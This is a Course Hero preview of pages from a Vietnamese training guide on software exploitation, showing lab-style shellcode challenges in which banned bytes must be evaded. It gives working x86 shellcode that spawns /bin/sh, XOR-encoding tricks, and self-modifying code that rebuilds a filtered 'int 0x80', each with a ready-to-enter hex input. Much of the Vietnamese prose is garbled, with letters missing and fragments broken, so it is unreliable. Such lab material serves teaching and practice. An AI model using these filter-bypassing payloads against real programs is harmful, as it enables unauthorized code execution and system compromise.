Hướng dẫn thực hành khai thác lỗ hổng phần mềm.docx

48 th c thi shellcode 3 ự so v i bài tr c bài

This preview shows page 71 - 75 out of 76 pages.

Hình 2.48 Th c thi shellcode-3 So v i bài tr c bài này c m thêm chu i bin. ướ B c 2: L p k ch b n khai thác: ướ Khi b c m chu i bin (62696e), may m n đây ch là giá tr ta v n có th s d ng cách add nh bài shellcode-1 tuy nhiên đây s s d ng XOR ư v i 20 đ đ n gi n là ta ch c n vi t hoa ch BIN. Ví d ơ ế a: be 0f 42 49 4e mov esi,0x4e49420f f: 81 f6 20 20 20 20 xor esi,0x20202020 B c 3: T o mã khai thác: ướ 0: 31 c9 xor ecx,ecx 2: f7 e1 mul ecx 4: 51 push ecx 5: 68 2f 2f 73 68 push 0x68732f2f a: be 0f 42 49 4e mov esi,0x4e49420f f: 81 f6 20 20 20 20 xor esi,0x20202020 15: 56 push esi 16: 54 push esp 17: 5b pop ebx 18: 04 0a add al,0xa 1a: fe c0 inc al 1c: cd 80 int 0x80 Input vào ch ng trình ươ 31C9F7E151682F2F7368BE0F42494E81F62020202056545B040AFEC 0CD80 29. Shellcode-4 M c tiêu : Gi i thi u các k thu t vi t shellcode. ế 71
Image of page 71

Subscribe to view the full document.

Mô t : Ch ng trình cho phép nh p vào shellcode sau đó th c thi ươ shellcode. Tuy nhiên c m m t s k t đòi h i ng i ch i ph i có ki n ỹ ự ườ ơ ế th c vi t code asm đ v t qua. ế ượ Các b c th c hi n ướ : B c 1: Phân tích đ bài: ướ Th c thi file shellcode-4 ta thu đ c: ượ Hình 2.49 Th c thi shellcode-3 So v i bài tr c bài này c m thêm l nh int 0x80. ướ B c 2: L p k ch b n khai thác: ướ Đ i v i các bài ch n ký t thì đây là m t trong nh ng lo i khó nh n nh t vì nó ch n đo n code mà luôn ph i có vì không có l nh nào thay th đ c cho l nh ng t th c thi c . ế ượ Đ i v i lo i này ta s d ng k thu t self-modify (t ch nh s a b n thân) nh ng ta ph i có đc v trí th c thi c a code r i XOR chính nó v i ư m t giá tr nào đó. đây khi reverse file th c thi ta th y khi ch ng ươ trình g i shellcode s có l nh call eax. Nh v y ta c n xem ta c n XOR ư v trí nào torng shellcode so v i eax thì s ph i + thêm offset bao nhiêu? 72
Image of page 72
B c 3: T o mã khai thác: ướ 0: 66 81 70 22 12 12 xor WORD PTR [eax+0x22],0x1212 6: 31 c9 xor ecx,ecx 8: f7 e1 mul ecx a: 51 push ecx b: 68 2f 2f 73 68 push 0x68732f2f 10: be 0f 42 49 4e mov esi,0x4e49420f 15: 81 f6 20 20 20 20 xor esi,0x20202020 1b: 56 push esi 1c: 54 push esp 1d: 5b pop ebx 1e: 04 0a add al,0xa 20: fe c0 inc al 22: df .byte 0xdf 23: 92 xchg edx,eax Ta th y sau l nh inc al (offset 0x20) s là l nh int 0x80 (offset 0x22) nên ta đ t tr c code ch đó là df92 thì khi xor v i 2020 s tr v cd80 ướ t ng ng v i int 0x80 ươ Input vào ch ng trình ươ 66817022121231C9F7E151682F2F7368BE0F42494E81F620202020565 45B040AFEC0DF92 30. Shellcode-5 M c tiêu : Gi i thi u các k thu t vi t shellcode. ế Mô t : Ch ng trình cho phép nh p vào shellcode sau đó th c thi ươ shellcode. Tuy nhiên c m m t s k t đòi h i ng i ch i ph i có ki n ỹ ự ườ ơ ế th c vi t code asm đ v t qua. ế ượ 73
Image of page 73

Subscribe to view the full document.

Các b c th c hi n ướ : B c 1: Phân tích mã ngu n: ướ Hình 2.50 Mã ngu
Image of page 74
Image of page 75
  • Fall '19

{[ snackBarMessage ]}

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern